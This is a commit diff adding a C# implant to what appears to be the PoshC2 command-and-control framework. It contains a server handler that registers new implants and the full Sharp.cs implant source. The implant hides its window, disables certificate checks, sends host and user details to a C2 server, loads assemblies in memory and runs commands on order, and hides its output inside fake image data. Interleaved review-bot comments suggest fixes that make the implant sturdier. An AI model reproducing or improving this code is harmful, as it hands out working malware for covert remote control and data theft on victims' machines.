Added CSharp Implant/Dll/Shellcode - More functionality coming soon
parent
971ef58e83
commit
190cb33288
|
@ -2,7 +2,7 @@
|
||||||
|
|
||||||
from DB import *
|
from DB import *
|
||||||
from Config import *
|
from Config import *
|
||||||
import os
|
import os, base64
|
||||||
|
|
||||||
def check_module_loaded( module_name, randomuri, force=False ):
|
def check_module_loaded( module_name, randomuri, force=False ):
|
||||||
try:
|
try:
|
||||||
|
|
18
C2Server.py
18
C2Server.py
|
@ -125,8 +125,24 @@ class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
||||||
implant_type = "Daisy"
|
implant_type = "Daisy"
|
||||||
if s.path == ("%s?m" % new_implant_url):
|
if s.path == ("%s?m" % new_implant_url):
|
||||||
implant_type = "OSX"
|
implant_type = "OSX"
|
||||||
|
if s.path == ("%s?c" % new_implant_url):
|
||||||
|
implant_type = "C#"
|
||||||
|
|
||||||
if implant_type == "OSX":
|
if implant_type == "C#":
|
||||||
|
cookieVal = (s.cookieHeader).replace("SessionID=","")
|
||||||
|
decCookie = decrypt(KEY, cookieVal)
|
||||||
|
IPAddress = "%s:%s" % (s.client_address[0],s.client_address[1])
|
||||||
|
Domain,User,Hostname,Arch,PID,Proxy = decCookie.split(";")
|
||||||
|
newImplant = Implant(IPAddress, implant_type, Domain.decode("utf-8"), User.decode("utf-8"), Hostname.decode("utf-8"), Arch, PID, Proxy)
|
||||||
|
newImplant.save()
|
||||||
|
newImplant.display()
|
||||||
|
responseVal = encrypt(KEY, newImplant.SharpCore)
|
||||||
|
s.send_response(200)
|
||||||
|
s.send_header("Content-type", "text/html")
|
||||||
|
s.end_headers()
|
||||||
|
s.wfile.write(responseVal)
|
||||||
|
|
||||||
|
elif implant_type == "OSX":
|
||||||
cookieVal = (s.cookieHeader).replace("SessionID=","")
|
cookieVal = (s.cookieHeader).replace("SessionID=","")
|
||||||
decCookie = decrypt(KEY, cookieVal)
|
decCookie = decrypt(KEY, cookieVal)
|
||||||
IPAddress = "%s:%s" % (s.client_address[0],s.client_address[1])
|
IPAddress = "%s:%s" % (s.client_address[0],s.client_address[1])
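Review bot: `Domain,User,Hostname,Arch,PID,Proxy = decCookie.split(";")` in the new C# branch raises ValueError whenever the decrypted cookie does not contain exactly six `;`-separated fields, so a malformed or mis-keyed cookie ends in a traceback instead of a clean error response unless an enclosing try outside the hunk catches it; guard it with `fields = decCookie.split(";")` and `if len(fields) != 6: s.send_response(404); s.end_headers(); return` before unpacking. The branch also repeats the cookie-strip, decrypt and IPAddress lines of the OSX branch that follows, and the Implant construction looks identical apart from SharpCore versus PythonCore (the OSX tail is outside the hunk), so a small helper returning the parsed fields would remove the duplication. The handler method continues outside the hunk.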
|
||||||
|
|
4
Core.py
4
Core.py
|
@ -38,6 +38,10 @@ def load_module(module_name):
|
||||||
file = codecs.open(("%sModules/%s" % (POSHDIR,module_name)), 'r', encoding='utf-8-sig')
|
file = codecs.open(("%sModules/%s" % (POSHDIR,module_name)), 'r', encoding='utf-8-sig')
|
||||||
return file.read()
|
return file.read()
|
||||||
|
|
||||||
|
def load_module_sharp(module_name):
|
||||||
|
file = open(("%sModules/%s" % (POSHDIR,module_name)), 'r+b')
|
||||||
|
return base64.b64encode(file.read())
|
||||||
|
|
||||||
def get_images():
|
def get_images():
|
||||||
dir_path = os.path.dirname(os.path.realpath(__file__))
|
dir_path = os.path.dirname(os.path.realpath(__file__))
|
||||||
rootimagedir = "%s/Images/" % dir_path
|
rootimagedir = "%s/Images/" % dir_path
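Review bot: `load_module_sharp` opens the module with mode `'r+b'`, which asks for write access the function never uses, and the handle is never closed; write it as `with open("%sModules/%s" % (POSHDIR, module_name), 'rb') as f:` followed by `return base64.b64encode(f.read())`. The neighbouring `load_module` leaks its handle the same way, but that is pre-existing. Whether Core.py imports `base64` is not visible in this section — the `import os, base64` change at the top of the page belongs to a file whose header is outside the view.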
|
||||||
|
|
|
@ -0,0 +1,506 @@
|
||||||
|
using System;
|
||||||
|
using System.Linq;
|
||||||
|
using System.Net;
|
||||||
|
using System.Text;
|
||||||
|
using System.Text.RegularExpressions;
|
||||||
|
using System.Reflection;
|
||||||
|
using System.Threading;
|
||||||
|
using System.Diagnostics;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
using System.IO;
|
||||||
|
using System.IO.Compression;
|
||||||
|
|
||||||
|
//mono-csc /opt/PoshC2_Python_Git/Files/Sharp.cs -out:/tmp/Sharp.dll -target:library
|
||||||
|
//cat /tmp/Sharp.dll | base64 -w 0 | xclip
|
||||||
|
|
||||||
|
public class Program
|
||||||
|
{
|
||||||
|
[DllImport("kernel32.dll")]
|
||||||
|
static extern IntPtr GetConsoleWindow();
|
||||||
|
[DllImport("user32.dll")]
|
||||||
|
static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
|
||||||
|
public const int SW_HIDE = 0;
|
||||||
|
public const int SW_SHOW = 5;
|
||||||
|
|
||||||
|
public static void Sharp()
|
||||||
|
{
|
||||||
|
var handle = GetConsoleWindow();
|
||||||
|
ShowWindow(handle, SW_HIDE);
|
||||||
|
AllowUntrustedCertificates();
|
||||||
|
try { primer(); } catch {}
|
||||||
|
Thread.Sleep(300000);
|
||||||
|
try { primer(); } catch { }
|
||||||
|
Thread.Sleep(600000);
|
||||||
|
try { primer(); } catch { }
|
||||||
|
}
|
||||||
|
|
||||||
|
public static void Main()
|
||||||
|
{
|
||||||
|
Sharp();
|
||||||
|
}
|
||||||
|
|
||||||
|
static byte[] Combine(byte[] first, byte[] second)
|
||||||
|
{
|
||||||
|
byte[] ret = new byte[first.Length + second.Length];
|
||||||
|
Buffer.BlockCopy(first, 0, ret, 0, first.Length);
|
||||||
|
Buffer.BlockCopy(second, 0, ret, first.Length, second.Length);
|
||||||
|
return ret;
|
||||||
|
}
|
||||||
|
|
||||||
|
static System.Net.WebClient GetWebRequest(string cookie)
|
||||||
|
{
|
||||||
|
var x = new System.Net.WebClient();
|
||||||
|
|
||||||
|
string purl = "#REPLACEPROXYURL#";
|
||||||
|
string puser = "#REPLACEPROXYUSER#";
|
||||||
|
string ppass = "#REPLACEPROXYPASSWORD#";
|
||||||
|
|
||||||
|
if (!String.IsNullOrEmpty(purl)) {
|
||||||
|
WebProxy proxy = new WebProxy();
|
||||||
|
proxy.Address = new Uri(purl);
|
||||||
|
proxy.Credentials = new NetworkCredential(puser, ppass);
|
||||||
|
proxy.UseDefaultCredentials = false;
|
||||||
|
proxy.BypassProxyOnLocal = false;
|
||||||
|
x.Proxy = proxy;
|
||||||
|
}
|
||||||
|
|
||||||
|
string df = "#REPLACEDF#";
|
||||||
|
if (!String.IsNullOrEmpty(df)) {
|
||||||
|
x.Headers.Add("Host",df);
|
||||||
|
}
|
||||||
|
|
||||||
|
x.Headers.Add("User-Agent", "#REPLACEUSERAGENT#");
|
||||||
|
x.Headers.Add("Referer", "#REPLACEREFERER#");
|
||||||
|
|
||||||
|
if (cookie != null)
|
||||||
|
{
|
||||||
|
x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
|
||||||
|
}
|
||||||
|
|
||||||
|
return x;
|
||||||
|
}
|
||||||
|
|
||||||
|
static string Decryption(string key, string enc)
|
||||||
|
{
|
||||||
|
var b = System.Convert.FromBase64String(enc);
|
||||||
|
Byte[] IV = new Byte[16];
|
||||||
|
Array.Copy(b, IV, 16);
|
||||||
|
try {
|
||||||
|
var a = CAMR(key, System.Convert.ToBase64String(IV));
|
||||||
|
var d = a.CreateDecryptor();
|
||||||
|
var u = d.TransformFinalBlock(b, 16, b.Length - 16);
|
||||||
|
return System.Text.Encoding.UTF8.GetString(u);
|
||||||
|
} catch {
|
||||||
|
var a = CAMA(key, System.Convert.ToBase64String(IV));
|
||||||
|
var d = a.CreateDecryptor();
|
||||||
|
var u = d.TransformFinalBlock(b, 16, b.Length - 16);
|
||||||
|
return System.Text.Encoding.UTF8.GetString(u);
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
static string Encryption(string key, string un, bool comp = false)
|
||||||
|
{
|
||||||
|
var b = System.Text.Encoding.UTF8.GetBytes(un);
|
||||||
|
byte[] byEnc = b;
|
||||||
|
if (comp){
|
||||||
|
byEnc = Compress(b);
|
||||||
|
}
|
||||||
|
try {
|
||||||
|
var a = CAMR(key, null);
|
||||||
|
var e = a.CreateEncryptor();
|
||||||
|
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
|
||||||
|
byte[] p = null;
|
||||||
|
p = Combine(a.IV, f);
|
||||||
|
return System.Convert.ToBase64String(p);
|
||||||
|
} catch {
|
||||||
|
var a = CAMA(key, null);
|
||||||
|
var e = a.CreateEncryptor();
|
||||||
|
var f = e.TransformFinalBlock(byEnc, 0, byEnc.Length);
|
||||||
|
byte[] p = null;
|
||||||
|
p = Combine(a.IV, f);
|
||||||
|
return System.Convert.ToBase64String(p);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
static System.Security.Cryptography.AesCryptoServiceProvider CAMA(string key,string IV)
|
||||||
|
{
|
||||||
|
System.Security.Cryptography.AesCryptoServiceProvider b = new System.Security.Cryptography.AesCryptoServiceProvider();
|
||||||
|
b.Mode = System.Security.Cryptography.CipherMode.CBC;
|
||||||
|
b.Padding = System.Security.Cryptography.PaddingMode.Zeros;
|
||||||
|
b.BlockSize = 128;
|
||||||
|
b.KeySize = 256;
|
||||||
|
|
||||||
|
if (IV != null)
|
||||||
|
{
|
||||||
|
b.IV = System.Convert.FromBase64String(IV);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (key != null)
|
||||||
|
{
|
||||||
|
b.Key = System.Convert.FromBase64String(key);
|
||||||
|
}
|
||||||
|
|
||||||
|
return b;
|
||||||
|
}
|
||||||
|
|
||||||
|
static System.Security.Cryptography.RijndaelManaged CAMR(string key,string IV)
|
||||||
|
{
|
||||||
|
System.Security.Cryptography.RijndaelManaged a = new System.Security.Cryptography.RijndaelManaged();
|
||||||
|
a.Mode = System.Security.Cryptography.CipherMode.CBC;
|
||||||
|
a.Padding = System.Security.Cryptography.PaddingMode.Zeros;
|
||||||
|
a.BlockSize = 128;
|
||||||
|
a.KeySize = 256;
|
||||||
|
|
||||||
|
if (IV != null)
|
||||||
|
{
|
||||||
|
a.IV = System.Convert.FromBase64String(IV);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (key != null)
|
||||||
|
{
|
||||||
|
a.Key = System.Convert.FromBase64String(key);
|
||||||
|
}
|
||||||
|
|
||||||
|
return a;
|
||||||
|
}
|
||||||
|
|
||||||
|
static void AllowUntrustedCertificates()
|
||||||
|
{
|
||||||
|
try
|
||||||
|
{
|
||||||
|
System.Net.ServicePointManager.ServerCertificateValidationCallback = new System.Net.Security.RemoteCertificateValidationCallback(delegate { return true; } );
|
||||||
|
}
|
||||||
|
catch { }
|
||||||
|
}
|
||||||
|
|
||||||
|
static void primer()
|
||||||
|
{
|
||||||
|
DateTime now = DateTime.Now;
|
||||||
|
DateTime killDate = Convert.ToDateTime("#REPLACEKILLDATE#");
|
||||||
|
if (killDate < now){
|
||||||
|
System.Environment.Exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
var u = System.Security.Principal.WindowsIdentity.GetCurrent().Name;
|
||||||
|
var dn = System.Environment.UserDomainName;
|
||||||
|
var cn = System.Environment.GetEnvironmentVariable("COMPUTERNAME");
|
||||||
|
var arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
|
||||||
|
int pid = Process.GetCurrentProcess().Id;
|
||||||
|
Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
|
||||||
|
string o = $"{dn};{u};{cn};{arch};{pid};#REPLACEBASEURL#";
|
||||||
|
string key = "#REPLACEKEY#";
|
||||||
|
var pp = Encryption(key, o);
|
||||||
|
string baseURL = "#REPLACEBASEURL#";
|
||||||
|
string s = "#REPLACESTARTURL#";
|
||||||
|
var primer = GetWebRequest(pp).DownloadString(s);
|
||||||
|
var x = Decryption(key, primer);
|
||||||
|
|
||||||
|
Regex re = new Regex("RANDOMURI19901(.*)10991IRUMODNAR");
|
||||||
|
Match m = re.Match(x);
|
||||||
|
string RandomURI = m.Groups[1].ToString();
|
||||||
|
|
||||||
|
re = new Regex("URLS10484390243(.*)34209348401SLRU");
|
||||||
|
m = re.Match(x);
|
||||||
|
string URLS = m.Groups[1].ToString();
|
||||||
|
|
||||||
|
re = new Regex("KILLDATE1665(.*)5661ETADLLIK");
|
||||||
|
m = re.Match(x);
|
||||||
|
var KillDate = m.Groups[1].ToString();
|
||||||
|
|
||||||
|
re = new Regex("SLEEP98001(.*)10089PEELS");
|
||||||
|
m = re.Match(x);
|
||||||
|
var Sleep = m.Groups[1].ToString();
|
||||||
|
|
||||||
|
re = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
|
||||||
|
m = re.Match(x);
|
||||||
|
var NewKey = m.Groups[1].ToString();
|
||||||
|
|
||||||
|
re = new Regex("IMGS19459394(.*)49395491SGMI");
|
||||||
|
m = re.Match(x);
|
||||||
|
var IMGs = m.Groups[1].ToString();
|
||||||
|
|
||||||
|
ImplantCore(baseURL, RandomURI, URLS, KillDate, Sleep, NewKey, IMGs);
|
||||||
|
}
|
||||||
|
|
||||||
|
static byte[] Compress(byte[] raw)
|
||||||
|
{
|
||||||
|
using (MemoryStream memory = new MemoryStream())
|
||||||
|
{
|
||||||
|
using (GZipStream gzip = new GZipStream(memory, CompressionMode.Compress, true))
|
||||||
|
{
|
||||||
|
gzip.Write(raw, 0, raw.Length);
|
||||||
|
}
|
||||||
|
return memory.ToArray();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
static byte[] GetImgData(byte[] cmdoutput, string[] stringnewIMGS)
|
||||||
|
{
|
||||||
|
Random rnd = new Random();
|
||||||
|
string randimg = stringnewIMGS[rnd.Next(stringnewIMGS.Length)];
|
||||||
|
byte[] imgBytes = System.Convert.FromBase64String(randimg);
|
||||||
|
var maxByteslen = 1500;
|
||||||
|
var maxDatalen = 1500 + cmdoutput.Length;
|
||||||
|
var imageByteslen = imgBytes.Length;
|
||||||
|
var paddingByteslen = maxByteslen - imageByteslen;
|
||||||
|
var BytePadding = System.Text.Encoding.UTF8.GetBytes((RandomString(paddingByteslen)));
|
||||||
|
|
||||||
|
var ImageBytesFull = new byte[maxDatalen];
|
||||||
|
System.Array.Copy(imgBytes, 0, ImageBytesFull, 0, imgBytes.Length);
|
||||||
|
System.Array.Copy(BytePadding, 0, ImageBytesFull, imgBytes.Length, BytePadding.Length);
|
||||||
|
System.Array.Copy(cmdoutput, 0, ImageBytesFull, imgBytes.Length + BytePadding.Length, cmdoutput.Length);
|
||||||
|
return ImageBytesFull;
|
||||||
|
}
|
||||||
|
|
||||||
|
static Random random = new Random();
|
||||||
|
|
||||||
|
static string RandomString(int length)
|
||||||
|
{
|
||||||
|
const string chars = "...................@..........................Tyscf";
|
||||||
|
return new string(Enumerable.Repeat(chars, length).Select(s => s[random.Next(s.Length)]).ToArray());
|
||||||
|
}
|
||||||
|
|
||||||
|
static Type LoadSomething(string assemblyQualifiedName)
|
||||||
|
{
|
||||||
|
// Throws exception is type was not found
|
||||||
|
return Type.GetType(
|
||||||
|
assemblyQualifiedName,
|
||||||
|
(name) =>
|
||||||
|
{
|
||||||
|
// Returns the assembly of the type by enumerating loaded assemblies
|
||||||
|
// in the app domain
|
||||||
|
return AppDomain.CurrentDomain.GetAssemblies().Where(z => z.FullName == name.FullName).FirstOrDefault();
|
||||||
|
},
|
||||||
|
null,
|
||||||
|
true);
|
||||||
|
}
|
||||||
|
|
||||||
|
static void ImplantCore(string baseURL, string RandomURI, string stringURLS, string KillDate, string Sleep, string Key, string stringIMGS)
|
||||||
|
{
|
||||||
|
var re = new Regex("(?<=\")[^\"]*(?=\")|[^\" ]+");
|
||||||
|
|
||||||
|
string strURLS = stringURLS.Replace(",","");
|
||||||
|
var stringnewURLS = re.Matches(strURLS).Cast<Match>().Select(m => m.Value).ToArray();
|
||||||
|
stringnewURLS = stringnewURLS.Where(m => !string.IsNullOrEmpty(m)).ToArray();
|
||||||
|
|
||||||
|
string strIMGS = stringIMGS.Replace(",","");
|
||||||
|
var stringnewIMGS = re.Matches(strIMGS).Cast<Match>().Select(m => m.Value).ToArray();
|
||||||
|
stringnewIMGS = stringnewIMGS.Where(m => !string.IsNullOrEmpty(m)).ToArray();
|
||||||
|
|
||||||
|
int beacontime = 5;
|
||||||
|
|
||||||
|
if (!Int32.TryParse(Sleep, out beacontime))
|
||||||
|
{
|
||||||
|
beacontime = 5;
|
||||||
|
}
|
||||||
|
|
||||||
|
while(true)
|
||||||
|
{
|
||||||
|
Random rnd = new Random();
|
||||||
|
string URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
|
||||||
|
string G = (Guid.NewGuid()).ToString();
|
||||||
|
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
|
||||||
|
Thread.Sleep(beacontime*1000);
|
||||||
|
|
||||||
|
DateTime now = DateTime.Now;
|
||||||
|
DateTime killDate = Convert.ToDateTime(KillDate);
|
||||||
|
if (killDate < now){
|
||||||
|
System.Environment.Exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
var cmd = GetWebRequest(null).DownloadString(URL);
|
||||||
|
string output = "";
|
||||||
|
try {
|
||||||
|
string x = "";
|
||||||
|
try {
|
||||||
|
x = Decryption(Key, cmd);
|
||||||
|
x = x.Replace("\0", string.Empty);
|
||||||
|
} catch {}
|
||||||
|
using (System.IO.StreamWriter file = new System.IO.StreamWriter(@"C:\temp\log.txt", true))
|
||||||
|
{
|
||||||
|
file.WriteLine(x.ToString().TrimEnd());
|
||||||
|
}
|
||||||
|
if (x.ToLower().StartsWith("multicmd"))
|
||||||
|
{
|
||||||
|
string splitcmd = x.Replace("multicmd","");
|
||||||
|
string[] split = splitcmd.Split(new string[] {"!d-3dion@LD!-d"}, StringSplitOptions.RemoveEmptyEntries);
|
||||||
|
foreach (string c in split)
|
||||||
|
{
|
||||||
|
output = "";
|
||||||
|
//add download-file
|
||||||
|
//add upload-file
|
||||||
|
//add implant-core features, screenshot, tasklist, etc
|
||||||
|
|
||||||
|
if (c.ToLower() == "pwd") {
|
||||||
|
output = Directory.GetCurrentDirectory();
|
||||||
|
}
|
||||||
|
|
||||||
|
if (c.ToLower().StartsWith("dir") || c.ToLower().StartsWith("ls")){
|
||||||
|
string dirPath = "";
|
||||||
|
var stringOutput = new StringWriter();
|
||||||
|
Console.SetOut(stringOutput);
|
||||||
|
if (c.ToLower() == "dir" || c.ToLower() == "ls") {
|
||||||
|
dirPath = Directory.GetCurrentDirectory();
|
||||||
|
} else {
|
||||||
|
dirPath = Regex.Replace(c, "dir ", "", RegexOptions.IgnoreCase);
|
||||||
|
dirPath = Regex.Replace(c, "ls ", "", RegexOptions.IgnoreCase);
|
||||||
|
}
|
||||||
|
Console.WriteLine("Directory listing: {0} \r\n", dirPath);
|
||||||
|
string[] folderPaths = Directory.GetDirectories(dirPath, "*", SearchOption.TopDirectoryOnly);
|
||||||
|
foreach (var f in folderPaths)
|
||||||
|
{
|
||||||
|
try {
|
||||||
|
Console.WriteLine("d----- {0}", f.Normalize());
|
||||||
|
}
|
||||||
|
catch {}
|
||||||
|
}
|
||||||
|
string[] filePaths = Directory.GetFiles(dirPath, "*", SearchOption.TopDirectoryOnly);
|
||||||
|
foreach (var f in filePaths)
|
||||||
|
{
|
||||||
|
try {
|
||||||
|
Console.WriteLine("------ {0}", f.Normalize());
|
||||||
|
}
|
||||||
|
catch {}
|
||||||
|
}
|
||||||
|
output = stringOutput.ToString();
|
||||||
|
}
|
||||||
|
|
||||||
|
// load and execute assembly in current app domain
|
||||||
|
if (c.ToLower().StartsWith("loadmodule")){
|
||||||
|
//var stringOutput = new StringWriter();
|
||||||
|
//Console.SetOut(stringOutput);
|
||||||
|
string module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
|
||||||
|
Assembly assembly = System.Reflection.Assembly.Load(System.Convert.FromBase64String(module));
|
||||||
|
//var pop = assembly.GetType("Seatbelt.Program").InvokeMember("UserChecks", BindingFlags.InvokeMethod, null, null, null);
|
||||||
|
//output = stringOutput.ToString();
|
||||||
|
}
|
||||||
|
|
||||||
|
// list loaded assemblies
|
||||||
|
if (c.ToLower().StartsWith("listmodules")){
|
||||||
|
var appd = AppDomain.CurrentDomain.GetAssemblies();
|
||||||
|
foreach (var ass in appd)
|
||||||
|
{
|
||||||
|
output += ass.FullName.ToString() + "\n";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (c.ToLower() == "ps"){
|
||||||
|
var loadedType = LoadSomething("ProcHandler, Get-ProcessList, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null");
|
||||||
|
var xxx = loadedType.Assembly.GetType("ProcHandler").InvokeMember("GetProcesses", BindingFlags.InvokeMethod, null, null, null);
|
||||||
|
output = xxx.ToString();
|
||||||
|
}
|
||||||
|
|
||||||
|
// run loaded assemblies
|
||||||
|
if (c.ToLower().StartsWith("run-assembly")){
|
||||||
|
string[] splitargs = c.Split(new string[] {" "}, StringSplitOptions.RemoveEmptyEntries);
|
||||||
|
string qualifiedname = splitargs[1];
|
||||||
|
string name = splitargs[2];
|
||||||
|
string method = splitargs[3];
|
||||||
|
var AppDomainAss = AppDomain.CurrentDomain.GetAssemblies();
|
||||||
|
foreach (var Ass in AppDomainAss)
|
||||||
|
{
|
||||||
|
if (Ass.FullName.ToString().ToLower().StartsWith(name.ToLower()))
|
||||||
|
{
|
||||||
|
var stringOutput = new StringWriter();
|
||||||
|
Console.SetOut(stringOutput);
|
||||||
|
var loadedType = LoadSomething(qualifiedname + ", " + Ass.FullName);
|
||||||
|
var xxx = loadedType.Assembly.GetType(qualifiedname).InvokeMember(method, BindingFlags.InvokeMethod, null, null, null);
|
||||||
|
output = stringOutput.ToString();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// try to load another app domain and unload each time
|
||||||
|
if (c.ToLower().StartsWith("loadmodule-appdomain")){
|
||||||
|
var stringOutput = new StringWriter();
|
||||||
|
Console.SetOut(stringOutput);
|
||||||
|
string module = Regex.Replace(c, "loadmodule", "", RegexOptions.IgnoreCase);
|
||||||
|
AppDomain dom = AppDomain.CreateDomain("RANDOM");
|
||||||
|
Assembly assembly = dom.Load(System.Convert.FromBase64String(module));
|
||||||
|
var pop = assembly.GetType("Seatbelt.Program").InvokeMember("UserChecks", BindingFlags.InvokeMethod, null, null, null);
|
||||||
|
output = stringOutput.ToString();
|
||||||
|
AppDomain.Unload(dom);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (c.ToLower().StartsWith("exit")){
|
||||||
|
System.Environment.Exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (c.ToLower().StartsWith("start-process")){
|
||||||
|
string proc = c.Replace("'", "");
|
||||||
|
proc = proc.Replace("\"", "");
|
||||||
|
string pstart = Regex.Replace(proc, "start-process ", "", RegexOptions.IgnoreCase);
|
||||||
|
pstart = Regex.Replace(pstart, "-argumentlist(.*)", "", RegexOptions.IgnoreCase);
|
||||||
|
string args = Regex.Replace(proc, "(.*)argumentlist ", "", RegexOptions.IgnoreCase);
|
||||||
|
Process p = new Process();
|
||||||
|
p.StartInfo.UseShellExecute = false;
|
||||||
|
p.StartInfo.RedirectStandardOutput = true;
|
||||||
|
p.StartInfo.RedirectStandardError = true;
|
||||||
|
p.StartInfo.CreateNoWindow = true;
|
||||||
|
p.StartInfo.FileName = pstart;
|
||||||
|
p.StartInfo.Arguments = args;
|
||||||
|
p.Start();
|
||||||
|
output = p.StandardOutput.ReadToEnd();
|
||||||
|
output = output + p.StandardError.ReadToEnd();
|
||||||
|
p.WaitForExit();
|
||||||
|
}
|
||||||
|
|
||||||
|
if (c.ToLower().StartsWith("setbeacon") || c.ToLower().StartsWith("beacon")) {
|
||||||
|
string beacon = Regex.Replace(c, "setbeacon ", "", RegexOptions.IgnoreCase);
|
||||||
|
beacon = Regex.Replace(beacon, "beacon ", "", RegexOptions.IgnoreCase);
|
||||||
|
if (beacon.ToLower().Contains("s"))
|
||||||
|
{
|
||||||
|
beacon = Regex.Replace(beacon, "s", "", RegexOptions.IgnoreCase);
|
||||||
|
if (!Int32.TryParse(beacon, out beacontime))
|
||||||
|
{
|
||||||
|
beacontime = 5;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else if (beacon.ToLower().Contains("m"))
|
||||||
|
{
|
||||||
|
beacon = Regex.Replace(beacon, "m", "", RegexOptions.IgnoreCase);
|
||||||
|
if (!Int32.TryParse(beacon, out beacontime))
|
||||||
|
{
|
||||||
|
beacontime = 5;
|
||||||
|
}
|
||||||
|
beacontime = beacontime * 60;
|
||||||
|
}
|
||||||
|
else if (beacon.ToLower().Contains("h"))
|
||||||
|
{
|
||||||
|
beacon = Regex.Replace(beacon, "h", "", RegexOptions.IgnoreCase);
|
||||||
|
if (!Int32.TryParse(beacon, out beacontime))
|
||||||
|
{
|
||||||
|
beacontime = 5;
|
||||||
|
}
|
||||||
|
beacontime = beacontime * 60;
|
||||||
|
beacontime = beacontime * 60;
|
||||||
|
}
|
||||||
|
else if (!Int32.TryParse(beacon, out beacontime))
|
||||||
|
{
|
||||||
|
beacontime = 5;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
|
||||||
|
G = (Guid.NewGuid()).ToString();
|
||||||
|
URL = baseURL+"/"+URL+G+"/?"+RandomURI;
|
||||||
|
string task = Encryption(Key, c);
|
||||||
|
string coutput = Encryption(Key, output, true);
|
||||||
|
byte[] outputBytes = System.Convert.FromBase64String(coutput);
|
||||||
|
byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS);
|
||||||
|
GetWebRequest(task).UploadData(URL, sendBytes);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
} catch (Exception e) {
|
||||||
|
URL = stringnewURLS[rnd.Next(stringnewURLS.Length)];
|
||||||
|
URL = baseURL+"/"+URL+RandomURI;
|
||||||
|
string task = Encryption(Key, "Error");
|
||||||
|
string eroutput = Encryption(Key, "Error: " + output + e, true);
|
||||||
|
byte[] outputBytes = System.Convert.FromBase64String(eroutput);
|
||||||
|
byte[] sendBytes = GetImgData(outputBytes, stringnewIMGS);
|
||||||
|
GetWebRequest(task).UploadData(URL, sendBytes);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
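Review bot: `Console.SetOut(stringOutput)` in the dir/ls, run-assembly and loadmodule-appdomain branches of ImplantCore replaces the process-wide standard output and never restores it, and the StringWriter is never disposed, so every later Console.WriteLine in the process lands in a writer that belongs to an already finished command; save the previous writer with `TextWriter prev = Console.Out;` before the swap and put `Console.SetOut(prev);` in a finally. The same capture block is pasted three times and would be clearer as one helper. Separately, CAMR and CAMA configure identical CBC/Zeros/128/256 parameters, so the try/catch fallbacks in Decryption and Encryption repeat their bodies verbatim; a single helper taking a `System.Security.Cryptography.SymmetricAlgorithm` would halve both methods.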
|
30
Help.py
30
Help.py
|
@ -1,12 +1,12 @@
|
||||||
#!/usr/bin/python
|
#!/usr/bin/python
|
||||||
|
|
||||||
logopic = """ __________ .__. _________ ________
|
logopic = """ __________ .__. _________ ________
|
||||||
\_______ \____ _____| |__ \_ ___ \ \_____ \
|
\_______ \____ _____| |__ \_ ___ \ \_____ \\
|
||||||
| ___/ _ \/ ___/ | \ / \ \/ / ____/
|
| ___/ _ \/ ___/ | \ / \ \/ / ____/
|
||||||
| | ( <_> )___ \| Y \ \ \____/ \
|
| | ( <_> )___ \| Y \ \ \____/ \\
|
||||||
|____| \____/____ >___| / \______ /\_______ \
|
|____| \____/____ >___| / \______ /\_______ \\
|
||||||
\/ \/ \/ \/
|
\/ \/ \/ \/
|
||||||
=============== v4.5 www.PoshC2.co.uk ============="""
|
=============== v4.6 www.PoshC2.co.uk ============="""
|
||||||
|
|
||||||
|
|
||||||
py_help1 = """
|
py_help1 = """
|
||||||
|
@ -34,6 +34,26 @@ searchhelp mimikatz
|
||||||
back
|
back
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
sharp_help1 = """
|
||||||
|
Implant Features:
|
||||||
|
=====================
|
||||||
|
ps
|
||||||
|
beacon 60s / beacon 10m / beacon 2h
|
||||||
|
ls/dir c:\\temp\\
|
||||||
|
pwd
|
||||||
|
loadmodule
|
||||||
|
loadmoduleforce
|
||||||
|
listmodule
|
||||||
|
run-assembly ProcHandler Get-ProcessList GetProcesses
|
||||||
|
start-process net -argumentlist users
|
||||||
|
kill-implant
|
||||||
|
hide-implant
|
||||||
|
unhide-implant
|
||||||
|
help
|
||||||
|
searchhelp listmodules
|
||||||
|
back
|
||||||
|
"""
|
||||||
|
|
||||||
posh_help1 = """
|
posh_help1 = """
|
||||||
Implant Features:
|
Implant Features:
|
||||||
=====================
|
=====================
|
||||||
|
@ -366,3 +386,5 @@ COMMANDS += ['invoke-psexecproxypayload','invoke-wmiproxypayload', 'invoke-dcomp
|
||||||
COMMANDS += ['invoke-psexecdaisypayload','invoke-wmidaisypayload', 'invoke-dcomdaisypayload']
|
COMMANDS += ['invoke-psexecdaisypayload','invoke-wmidaisypayload', 'invoke-dcomdaisypayload']
|
||||||
|
|
||||||
UXCOMMANDS = ["unhide-implant","hide-implant","help","searchhelp","python","loadmodule","loadmoduleforce","get-keystrokes","back","upload-file","download-file","install-persistence","remove-persistence","sai","startanotherimplant-keepfile","get-screenshot","startanotherimplant","pwd","id","ps","setbeacon","kill-implant"]
|
